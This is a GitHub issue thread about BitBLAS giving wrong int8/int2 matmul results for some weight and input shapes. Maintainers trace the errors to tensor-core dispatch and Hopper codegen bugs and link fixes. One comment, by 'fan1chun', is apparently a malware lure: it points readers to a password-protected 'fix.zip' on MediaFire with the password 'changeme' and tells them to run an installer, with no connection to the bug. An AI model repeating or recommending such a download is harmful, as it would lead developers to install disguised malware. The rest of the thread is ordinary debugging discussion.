### ISSUE TITLE
Different outputs based on weight shape

### ISSUE THREAD

**Issue by MekkCyber** [microsoft/BitBLAS#157]
Hello,

While implementing a BitBlas Linear layer, I noticed something weird
```
import bitblas
from bitblas.cache import global_operator_cache, get_database_path
from bitblas import auto_detect_nvidia_target
BITBLAS_TARGET = auto_detect_nvidia_target()
BITBLAS_DATABASE_PATH = get_database_path()
import torch
import torch.nn.functional as F
import torch.nn as nn

class BitLinear158(nn.Module):
    """
    This is only for training, and kernel optimization is needed for efficiency.
    """
    def __init__(self, in_features: int, out_features: int, bias: bool = True, input_bits: int = 8,
                 device=None, dtype=None, config=None):
        super().__init__()
        self.in_features = in_features
        self.out_features = out_features
        self.input_bits = input_bits
        matmul_config = bitblas.MatmulConfig(
            N=self.out_features,  # N dimension
            K=self.in_features,  # K dimension
            A_dtype="int8",  # activation A dtype
            W_dtype="int2",  # weight W dtype
            accum_dtype="int32",  # accumulation dtype
            out_dtype="float32",  # output dtype
            layout="nt",  # matrix layout, "nt" indicates the layout of A is non-transpose and the layout of W is transpose
            with_bias=False,  # bias
            # configs for weight only quantization
            group_size=None,  # setting for grouped quantization
            with_scaling=False,  # setting for scaling factor
            with_zeros=False,  # setting for zeros
            zeros_mode=None,  # setting for how to calculating zeros
        )
        ENABLE_TUNING = True
        self.bitblas_matmul = self._get_or_create_bitblas_operator(matmul_config, ENABLE_TUNING)
        self.Qp = 2**(self.input_bits - 1) - 1
        self.register_buffer(
            "weight",
            torch.randint(0, 2,
                (out_features, in_features),
                dtype=torch.int8,
                device=device,
            ),
        )
        self.register_buffer(
            "weight_scale",
            torch.randn(
                (1),
                dtype=torch.bfloat16,
                device=device,
            ),
        )
        if bias : 
            self.register_buffer(
                "bias",
                torch.zeros(
                    (self.out_features),
                    dtype=torch.bfloat16,
                    device=device
                ))
        else : 
            self.bias = None
        self.create_bitblas_weights()

    def _get_or_create_bitblas_operator(self, config, enable_tuning):
        if global_operator_cache.size() == 0:
            global_operator_cache.load_from_database(BITBLAS_DATABASE_PATH, BITBLAS_TARGET)

        bitblas_matmul = global_operator_cache.get(config)
        if bitblas_matmul is None:
            # should disable tuning for the first time because we may require loading bitblas operator from database.
            bitblas_matmul = bitblas.Matmul(config, target=BITBLAS_TARGET, enable_tuning=False)
            if enable_tuning:
                bitblas_matmul.hardware_aware_finetune(topk=20)
                global_operator_cache.add(config, bitblas_matmul)
                global_operator_cache.save_into_database(BITBLAS_DATABASE_PATH, BITBLAS_TARGET)
                print("BitBLAS Tuning done, appended operator to global_operator_cache.")
            else:
                print("BitBLAS Operator created.")
        else:
            print("BitBLAS Operator found in global_operator_cache.")
        return bitblas_matmul
    
    def create_bitblas_weights(self):
        qweight = self.bitblas_matmul.transform_weight(self.weight)
        qweight = nn.Parameter(qweight, requires_grad=False)
        self.register_buffer("qweight", qweight)
    
    @torch.compile
    def activation_quant(self, x, num_bits=8):
        Qn = -(2**(num_bits - 1))
        Qp = 2**(num_bits - 1) - 1
        s = Qp / x.abs().max(dim=-1, keepdim=True).values.clamp(min=1e-5)
        result = (x * s).round().clamp(Qn, Qp)
        return result.type(torch.int8), s

    @torch.compile
    def post_quant_process(self, input, si, sw):
        out = input / si
        out = out / sw
        return out
    
    def simple_forward(self, x):
        w = self.weight
        w_quant = w.to(torch.bfloat16)
        x_quant, x_scale = self.activation_quant(x, self.input_bits)
        y = self.post_quant_process(F.linear(x_quant.to(torch.bfloat16), w_quant) , x_scale, self.weight_scale)
        if self.bias is not None : 
            y += self.bias.view(1, -1).expand_as(y)
        return y
    
    def forward(self, input):
        ref_result = self.simple_forward(input)
        print(ref_result)
        quant_input, si = self.activation_quant(input, self.input_bits)
        fp32_out = self.bitblas_matmul(quant_input, self.qweight)
        bf16_out = fp32_out.to(torch.bfloat16)
        sw = self.weight_scale
        out = self.post_quant_process(bf16_out, si, sw)
        print(out)
        if self.bias is not None:
            out += self.bias.view(1, -1).expand_as(out)
        torch.testing.assert_close(ref_result, out, rtol=1e-3, atol=1e-3)
        return out
    
size = 8192
linear = BitLinear158(size, size, False, 8, "cuda")
x = torch.rand((8, size), dtype=torch.bfloat16).cuda()
linear(x)
```
With the following code, when I set the weight shape to 8192, the assert_close passes, but when I set it to 16 for example I have ~98% mismatch ! Did you notice this before ?

**Comment by fan1chun** [comment]
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by LeiWang1999** [comment]
@MekkCyber , thank you for reporting this. I believe the issue is related to our schedule template dispatch policy, as the INT8 tensor core requires problem_k to be a multiple of 32. Let me take a look.

**Comment by LeiWang1999** [comment]
set size=32 works for me, I think we should consider fallback it to cuda core if the shape is really small.

**Comment by LeiWang1999** [comment]
it can now perform correct output for weight_shape 16 after this fix https://github.com/microsoft/BitBLAS/pull/159

**Comment by MekkCyber** [comment]
Thank you so much for the fix @LeiWang1999 !
I have an other question concerning the input size of x in the example I gave. When it's small like <8, i have mismatches too. Any idea why ? I think it causes some problems during inference when the seq_len of the context is small

**Comment by LeiWang1999** [comment]
@MekkCyber , btw, should remove  the database before testing. `rm -r ~/.cache/bitblas`

**Comment by MekkCyber** [comment]
Hi @LeiWang1999 Thank you for the tip of removing the cache, now it works with small input sizes. However can you please try this one : 
```
linear = BitLinear158(4096, 1024, False, 8, "cuda")
x = torch.rand((6, 4096), dtype=torch.bfloat16).cuda()
linear(x)
```
I have a lot of mismatches

**Comment by LeiWang1999** [comment]
@MekkCyber hi, I've tested this config on my device (A100), and I get the output:

```bash
BitBLAS Operator found in global_operator_cache.
tensor([[2496., 2576., 2528.,  ..., 2528., 2544., 2576.],
        [2528., 2560., 2528.,  ..., 2608., 2544., 2560.],
        [2512., 2560., 2512.,  ..., 2560., 2576., 2560.],
        [2544., 2560., 2528.,  ..., 2544., 2496., 2560.],
        [2544., 2560., 2528.,  ..., 2560., 2528., 2624.],
        [2496., 2560., 2528.,  ..., 2576., 2512., 2544.]], device='cuda:0',
       dtype=torch.bfloat16)
tensor([[2496., 2576., 2528.,  ..., 2528., 2544., 2576.],
        [2528., 2560., 2528.,  ..., 2608., 2544., 2560.],
        [2512., 2560., 2512.,  ..., 2560., 2576., 2560.],
        [2544., 2560., 2528.,  ..., 2544., 2496., 2560.],
        [2544., 2560., 2528.,  ..., 2560., 2528., 2624.],
        [2496., 2560., 2528.,  ..., 2576., 2512., 2544.]], device='cuda:0',
       dtype=torch.bfloat16)
```

Looks good.

**Comment by MekkCyber** [comment]
That's weird, on H100 it doesn't work

**Comment by LeiWang1999** [comment]
I think we should have a test with the latest update `pip install git+https://github.com/microsoft/BitBLAS.git`

**Comment by LeiWang1999** [comment]
Let me beg for a H100 machine for test..

**Comment by MekkCyber** [comment]
I will try the latest update from my side, and thank you for the great help

**Comment by LeiWang1999** [comment]
Hi @MekkCyber , would you mind provide the cuda version that you were using to reproduce the results?

**Comment by MekkCyber** [comment]
Yes ofc it's
```
Cuda compilation tools, release 12.1, V12.1.105
Build cuda_12.1.r12.1/compiler.32688072_0
```

**Comment by LeiWang1999** [comment]
@MekkCyber There do exist a bug on hopper codegen, now it has been fixed ref to pr #165, checkout the latest code and please do not forget to remove the database before testing dude.

```bash
/usr/bin/python /root/BitBLAS/debug/issue_157.py
2024-08-31 06:31:05 [BitBLAS:WARNING]: TVM target not found. Please set the TVM target environment variable using `export TVM_TARGET=<target>`, where <target> is one of the available targets can be found in the output of `tools/get_available_targets.py`.
BitBLAS Operator found in global_operator_cache.
tensor([[1344., 1320., 1320.,  ..., 1304., 1336., 1320.],
        [1336., 1296., 1304.,  ..., 1288., 1344., 1320.],
        [1336., 1304., 1304.,  ..., 1288., 1320., 1336.],
        ...,
        [1352., 1336., 1312.,  ..., 1296., 1344., 1352.],
        [1336., 1312., 1320.,  ..., 1288., 1336., 1336.],
        [1344., 1320., 1320.,  ..., 1304., 1344., 1320.]], device='cuda:0',
       dtype=torch.bfloat16)
tensor([[1344., 1320., 1320.,  ..., 1304., 1336., 1320.],
        [1336., 1296., 1304.,  ..., 1288., 1344., 1320.],
        [1336., 1304., 1304.,  ..., 1288., 1320., 1336.],
        ...,
        [1352., 1336., 1312.,  ..., 1296., 1344., 1352.],
        [1336., 1312., 1320.,  ..., 1288., 1336., 1336.],
        [1344., 1320., 1320.,  ..., 1304., 1344., 1320.]], device='cuda:0',
       dtype=torch.bfloat16)
```

**Comment by MekkCyber** [comment]
@LeiWang1999 Thank you so much for the help, I am still trying to install bitblas from source, I will try it once it works
